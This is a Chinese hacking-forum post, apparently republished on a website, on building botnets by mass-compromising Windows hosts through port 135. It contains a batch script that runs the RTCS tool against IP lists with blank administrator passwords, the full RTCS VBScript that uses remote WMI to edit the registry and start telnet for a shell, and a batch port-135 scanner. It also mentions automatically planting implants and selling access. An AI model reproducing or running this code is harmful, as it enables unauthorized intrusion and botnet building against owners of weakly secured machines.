關(guān)于135抓肉雞的分析最近好象135搞的很火熱 看見有人也把那個(gè)批量抓135肉雞的工具發(fā)出來了我也就說下把 反正俺也不早就不用那鳥東西了 上次看了那個(gè)也說一天抓1000只肉雞 由于我是開快進(jìn)看的 沒仔細(xì)的看 我以為他是自動(dòng)登陸telnet 所以我就暈死了 應(yīng)為自動(dòng)登陸telnet我以前研究很多 我由于我批處理我學(xué)的不怎么樣也就會(huì)點(diǎn)皮毛就加了他 結(jié)果他一上來就開口批量開23賣2000RMB 人品啊 我倒 那鳥東西不清楚大家知道作者不 那是02年安全焦點(diǎn)的大哥寫的 我有RT整個(gè)全套代碼的 一萬(wàn)年前我就知道怎么批量開23了 不廢話了先說其他的把 后來一位大哥把他的RT整套腳本整合寫了一個(gè)RCMD1。05這個(gè)是目前的最新版好象 需要解決的問題我詳細(xì)的說一下把 首先要解決的就是批量開23了 rtcs腳本（百度一下有下的找不到就是搜索水品問題了） 里面的代碼如果懂VBS的朋友去看下 就是先用VBS遠(yuǎn)程連接主機(jī)的wmi服務(wù) 然后剩下的是開啟和過認(rèn)證部分 以前有一篇文章分析過說是作者寫的有一個(gè)小BUG 就是如果原來已經(jīng)開啟的話可以直接轉(zhuǎn)到退出的 這里不多說這個(gè)了 for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit 這個(gè)是我以前寫的一個(gè)批處理 有興趣的朋友可以看下 其實(shí)很簡(jiǎn)單 外面流傳的需要過濾23 我的不需要過濾23 有興趣的朋友可以看下 代碼正確性沒測(cè)試應(yīng)為我寫過好幾個(gè)版本現(xiàn)在已經(jīng)不記得哪個(gè)是可以用的了 但是思路很明顯的相信大家可以看明白 要解決的問題二 我也嘗試了用腳本來實(shí)現(xiàn)先telnet ip 然后sendkey 后來發(fā)現(xiàn)問題大大的 只能一個(gè)一個(gè)種植不能實(shí)現(xiàn)批量種植 后來朋友給冰冰批量 就是現(xiàn)在大家可以在外面找的版本 他很好的解決了批量登陸和自動(dòng)種植的問題 調(diào)用輔助工具 設(shè)置登陸腳本然后自動(dòng)種植 但是我相信用的朋友一定知道有什么問題 telnet認(rèn)證是很復(fù)雜的 此外容易出現(xiàn)提示丟失腳本的錯(cuò)誤 其他的不知道說什么了 我今天上網(wǎng)給朋友搞東西 弄的累的要死 思路不是很清楚 我在總結(jié)下把 首先寫一個(gè)S掃描的BAT然后里面用FOR循環(huán)自動(dòng)整理IP 然后NT過濾 然后調(diào)用上面我發(fā)的批處理批量開23 然后寫一個(gè)批處理直接調(diào)用輔助工具自動(dòng)登陸自動(dòng)種植 效果如何 大家詳細(xì)的去看動(dòng)畫就知道了 而后來我寫的一個(gè)版本 就很帥了 嘿嘿 保密中 應(yīng)為工具是給兄弟群共享的 他們有業(yè)務(wù)來著 如果我把東西發(fā)布了說是會(huì)干掉我 怕怕 給會(huì)懂VBS的朋友說一下把 引導(dǎo)一下思路 前面的掃描和和NT過濾還是一樣的不說了 遠(yuǎn)程連接wmi大家可以看rtcs的腳本 關(guān)鍵地方就是下面了 難道遠(yuǎn)程連接到了wmi服務(wù)就只有開telnet一條出路嗎 貌似wmi功能多多把 具體能干什么去看安焦點(diǎn)rtcs作者02年的文章把 目前我寫的腳本和所有的工具打包起來也才70多K 同時(shí)開4個(gè)服務(wù)器一天抓1萬(wàn)只肉雞 信不信由你 相信大家都知道recton里有一個(gè)http種植者的功能把 去找找文章看人家怎么實(shí)現(xiàn)的 最近風(fēng)聲很緊有業(yè)務(wù)的朋友最好小心 最近的通道不是那么安全 這個(gè)是rtcs的代碼 自己保存成VBS on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number) wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function 經(jīng)典吧，呵呵，我覺得，呵呵，管理員要給我加錢啊，呵呵
關(guān)于for循環(huán) 我解釋下 for /f這個(gè)這個(gè)參數(shù)表示對(duì)文本操作 tokens表示截取 tokens=1,2表示選取1，2兩個(gè)部分 eol表示忽略 eol=-表示忽略-開始的行 delims表示分割符 delims=,表示對(duì)每行以“，”為分割符號(hào)對(duì)行進(jìn)行分割字符 那么我給大家寫一個(gè)S掃描自動(dòng)整理IP的批處理把 s.bat setlocal
cls
color A
title 自動(dòng)抓雞v1.0
echo ======================================================
echo 自動(dòng)抓雞v1.0
echo 作者：hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt 掃描那行的FOR循環(huán) for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是說 從ip.txt中對(duì)每行以空格分割 然后取得分割后的第一部分和第二部分字符 第一個(gè)%%i是形參 代替你要取出來的部分 那么后面的2個(gè)部分的%%i 和%%j表示取出的兩個(gè)部分按順序代替的參數(shù)了 后面的幾行都是掃描完成的result過濾整理 先忽略以空格 - P S開頭的行 然后用echo寫入文本來轉(zhuǎn)的 用法 大家把上面的批處理代碼保存成 s.bat然后在同一目錄建立一個(gè)ip.txt的文本 然后把下面的這些復(fù)制進(jìn)IP。TXT里面 （不需要整理 直接全放進(jìn)去 漢字不需要去掉） 掃描和整理結(jié)束以后會(huì)有一個(gè)S。TXT文本 自己打開看看效果把 ^_^ 忘了說了把s.exe ip.txt和s.bat放在同一目錄 好了我閃了.

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。